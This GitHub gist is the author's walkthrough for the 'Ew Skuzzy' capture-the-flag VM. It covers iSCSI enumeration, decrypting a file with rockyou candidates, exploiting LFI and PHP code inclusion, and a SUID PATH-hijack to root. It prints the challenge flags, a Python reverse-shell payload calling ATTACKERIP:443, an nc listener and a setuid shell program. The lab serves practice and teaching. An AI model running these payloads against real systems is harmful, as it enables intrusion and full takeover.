Skip to content

Instantly share code, notes, and snippets.

@vortexau
Last active March 12, 2017 00:49
Show Gist options
  • Save vortexau/730a34002cd961664c0a1248e15ac097 to your computer and use it in GitHub Desktop.
Save vortexau/730a34002cd961664c0a1248e15ac097 to your computer and use it in GitHub Desktop.
Ew Skuzzy - Walkthrough

Quick Walkthrough for Ew Skuzzy!

  1. Boot the VM, on virtualbox. IP Address assigned via DHCP will be displayed on the login screen in the vm display.
  2. Scan the IP with Nmap. 3 ports visible.
  • ssh
  • http
  • iscsi
  1. Skip SSH the VM has accounts which work with passwords, but I guarantee the passwords are NOT brute-forceable in shorter time than the designed path-to-root :).
  2. Scan the HTTP Server with 'dirb' and 'common.txt', and enjoy what you find.
  • Direct all hate to /dev/null, I'm just messing with you :p
  • Realise the name of the VM is a pointer to the path :)
  1. Kali needs to have iscsiadm tools installed
  • apt install open-iscsi
  1. Scan the iscsi server:
  • iscsiadm -m discovery -t st -p IP:3260
  1. Discover iscsi share:
  • IP:3260,1 iqn.2017-02.local.skuzzy:storage.sys0
  1. Mount iSCSI share:
  • iscsiadm -m node -p IP -l --target iqn.2017-02.local.skuzzy:storage.sys0
  1. Check disk is available
  • fdisk -l
  1. Make a mountpoint
  • mkdir /media/iscsi
  1. Mount the disk:
  • mount /dev/sdb /media/iscsi
  1. Browse to the disk:
  • cd /media/iscsi
  1. Find flag 1!
  • flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}
  1. Make another mount point:
  • mkdir /media/bobsdisk
  1. Mount the disk image:
  • mount /media/iscsi/bobsdisk.dsk /media/bobsdisk
  1. Read the file:
  • cat /media/bobsdisk/ToAlice.eml
  1. Discover flag2, and clues to decrypt ToAlice.csv.enc
  • flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}
  1. Decrypt ToAlice.csv.enc
  • 256 bit key
  1. Pull all 256 bit strings (32 bytes) from rockyou.txt
  • cat rockyou.txt| awk 'length($1) == 32' > 32char_strings.txt
  1. Check each one with a script.
  • password: supercalifragilisticoespialidoso
  • openssl aes-256-cbc -d -k password -in ToAlice.csv.enc -out ToAlice.csv -md sha256
  1. View contents of file:
  • cat ToAlice.csv
  1. URLs point to directories on the http server
  1. Find Flag 3
  • flag3{2cce194f49c6e423967b7f72316f48c5caf46e84}
  1. Access vulnerable PHP application
  1. Note there are two vulnerabilities which are required to be exploited for shell, LFI and PHP Misconfiguration.
  2. Access 'flag' link.
  • Rage because there is no flag in the page or the source.
  1. Use LFI Vulnerability to access flag content:
  1. Decode content provided in page to get actual flag:
  • echo "base64content" | base64 -d -
  • flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
  • Flag IS NEEDED for the next step of the challenge.
  1. To get shell:
  • Access "Feed Reader" link.
  • Select "Load Feed" link.
  • Note the format of the URL parameters.
  1. Using the LFI vulnerability above, view the source of the reader.php
  2. View the source of the page being loaded, and note the tags used to denote php
  • ##php##
  1. reader.php requires a key when loading from another server
  • The parameter is a URL parameter 'key'.
  1. Access the URL with the parameter key specified
  1. attackscript.txt contains PHP, to generate a reverse shell:
  • Example shell:
  print("See? RCE!");
  exec("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ATTACKERIP\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'");
  1. Start NC:
  • nc -vlp 443
  1. Catch shell!
  2. To get root:
  • suid binary in /opt
  1. create script or binary to be executed
  • Code, shell.c
  int main(void) {
       setgid(0); 
       setuid(0);
       execl("/bin/sh","sh",(char*)0); 
  }
  1. Compile, output to 'scp' binary
  • gcc -o scp shell.c
  1. Copy to /tmp
  2. Set path:
  • export PATH=/tmp:$PATH
  1. Set Permissions
  • chmod a+x /tmp/scp
  1. Get root!
  • /opt/alicebackup
  1. Final flag is in /root

DONE!

Thanks for playing - very interested in hearing feedback!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment